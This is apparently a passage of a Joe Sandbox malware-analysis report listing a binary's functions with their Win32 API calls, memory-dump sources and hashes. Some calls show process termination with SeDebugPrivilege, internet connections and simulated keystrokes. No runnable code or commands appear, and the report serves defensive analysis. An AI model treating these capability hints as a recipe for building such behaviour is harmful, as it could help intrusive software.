                                                                                                                                                                                                                                                                                                    Function 00A17567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A1758D
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A175CE
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00A175F6
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A1773A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A1775B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 079b8d96489a0499aab48d85ec29b18ac1cea343745ec656df731b470a287bc8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 61105b3c2b44d28cba3686ca3cdafc480839c33066e940745478c7f1a484ca97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 079b8d96489a0499aab48d85ec29b18ac1cea343745ec656df731b470a287bc8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C17C3990465AEFDB10CFA8C940BEDBBF1FF18310F14941AE8A5E7250DB34A995DB60
                                                                                                                                                                                                                                                                                                    Function 00A4D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8bb4becd24f7677ff72a3039e994b4425428f0026ea903aaf3676778152a6e75
                                                                                                                                                                                                                                                                                                    • Instruction ID: 44b97dcd2613ecfe4cc124f69c78d428f73af259a01735e334c9157e7bc43e74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bb4becd24f7677ff72a3039e994b4425428f0026ea903aaf3676778152a6e75
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92613879E04350AFDF22AFB8DDC17AE7BA4EF81320F14016DF944AB285E77198018791
                                                                                                                                                                                                                                                                                                    Function 00AA5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AA5C24
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00AA5C65
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00AA5C6B
                                                                                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AA5C6F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA79F2: DeleteObject.GDI32(00000000), ref: 00AA7A1E
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA5CAB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA5CB8
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AA5CEB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AA5D25
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AA5D34
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 21ba78be6866609ce18f4e13c2e74088777843590e619f50b46dd98a2f7b7285
                                                                                                                                                                                                                                                                                                    • Instruction ID: e279b0fb55d71c12f43bee0fe8c8c9cdd852fc47d4dd346c8c62cc5867f6dad7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21ba78be6866609ce18f4e13c2e74088777843590e619f50b46dd98a2f7b7285
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C551DD30E80B09BFEF249FB4CC49BD83BA1BB06360F104116F6259B1E1D775A980DB58
                                                                                                                                                                                                                                                                                                    Function 00A113A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A528D1
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A528EA
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A528FA
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A52912
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A52933
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A52942
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A5295F
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A5296E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 71b2dfeb3f3308d0f0c5e9f7938a9a866564861606cc715f8601a0b5723f3417
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b856a488dadcabefe16b2b6847a6ac7799e10504dd738095b82f15ae52718a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71b2dfeb3f3308d0f0c5e9f7938a9a866564861606cc715f8601a0b5723f3417
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89518870A0020AEFDB24CF65CC85BAA7BB5FF49720F104528FA529B6E0D770E991DB50
                                                                                                                                                                                                                                                                                                    Function 00A8CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A8CBC7
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A8CBDA
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00A8CBEE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8CCB7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: GetLastError.KERNEL32 ref: 00A8CD67
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: SetEvent.KERNEL32(?), ref: 00A8CD7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8CC98: InternetCloseHandle.WININET(00000000), ref: 00A8CD86
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 14d2259947a67a3d014261894e01f8219629d36c27d56861e6c092a472ac1357
                                                                                                                                                                                                                                                                                                    • Instruction ID: 30ebd9b5cefcae143b440ab6c5608459ce28790c6eb798b651e7fbf233fbca5a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14d2259947a67a3d014261894e01f8219629d36c27d56861e6c092a472ac1357
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5316DB1500705AFDB21AFB1CD44A67BBB8FF45320B04451DF89A86A50C731D915EF60
                                                                                                                                                                                                                                                                                                    Function 00A72EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A743AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetCurrentThreadId.KERNEL32 ref: 00A743B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A72F00), ref: 00A743BB
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A72F0A
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A72F28
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A72F2C
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A72F36
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A72F4E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A72F52
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A72F5C
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A72F70
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A72F74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 81d75e7858e23b751fd7811fdcd4e862f61f6a943673e3e3406e57e2872f43bb
                                                                                                                                                                                                                                                                                                    • Instruction ID: fe5c75d99eb8cde643810a2a535355eb0a7194f8e89cdafa2abd4d7b7a1f5106
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81d75e7858e23b751fd7811fdcd4e862f61f6a943673e3e3406e57e2872f43bb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC01D8307942107BFB1067A89C8AF593F59DB4EB12F104015F35DAE1E0CAE254458EA9
                                                                                                                                                                                                                                                                                                    Function 00A72150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A71D95,?,?,00000000), ref: 00A72159
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00A71D95,?,?,00000000), ref: 00A72160
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A71D95,?,?,00000000), ref: 00A72175
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00A71D95,?,?,00000000), ref: 00A7217D
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00A71D95,?,?,00000000), ref: 00A72180
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A71D95,?,?,00000000), ref: 00A72190
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00A71D95,00000000,?,00A71D95,?,?,00000000), ref: 00A72198
                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00A71D95,?,?,00000000), ref: 00A7219B
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00A721C1,00000000,00000000,00000000), ref: 00A721B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 98af40613e132e6ba34d0c0c2f237f93e5d1b822d271ac04d217d683559e9b21
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c82e78c7bf2391a79acabcba28830bce6fb330663351075a0b9d7d30f208cf5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98af40613e132e6ba34d0c0c2f237f93e5d1b822d271ac04d217d683559e9b21
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501A8B5240305BFEA10EBA5DC4DF6B7BACEB89711F418511FA45DB5E1DB709801CB20
                                                                                                                                                                                                                                                                                                    Function 00A9AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00A7DDAC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00A7DDBA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DD87: CloseHandle.KERNEL32(00000000), ref: 00A7DE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9ABCA
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A9ABDD
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9AC10
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A9ACC5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00A9ACD0
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9AD21
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                    • Opcode ID: 264804090d13d7f56c50d9a80380a3a8ca1a36347a25ac2befef7133ef839c1f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2a39bcf4e2df9682838183806fc203a9ad35797ea0af65f91fa6f09cb3e7a09b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 264804090d13d7f56c50d9a80380a3a8ca1a36347a25ac2befef7133ef839c1f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93619E74208242AFDB10DF54C594F65BBE1AF54308F58849DE8A64FBA2C771EC85CBD2
                                                                                                                                                                                                                                                                                                    Function 00AA4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AA43C1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AA43D6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AA43F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA4435
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AA4462
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AA4490
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3a9015a98f39ff9fe1291666eb7841754d670cc9457c096911484a116035b6d3
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8582b1ab8da18c4f14a489744915aea2ced1d62f22bbf39e0b4d472d4d559a21
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a9015a98f39ff9fe1291666eb7841754d670cc9457c096911484a116035b6d3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41AE71900309ABDF21DFA4CC49BEA7BA9FB4D350F10052AF955EB2D1D7B59980CBA0
                                                                                                                                                                                                                                                                                                    Function 00A7C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A7C6C4
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00A7C6E4
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00A7C71A
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(01266C50), ref: 00A7C76B
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(01266C50,?,00000001,00000030), ref: 00A7C793
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
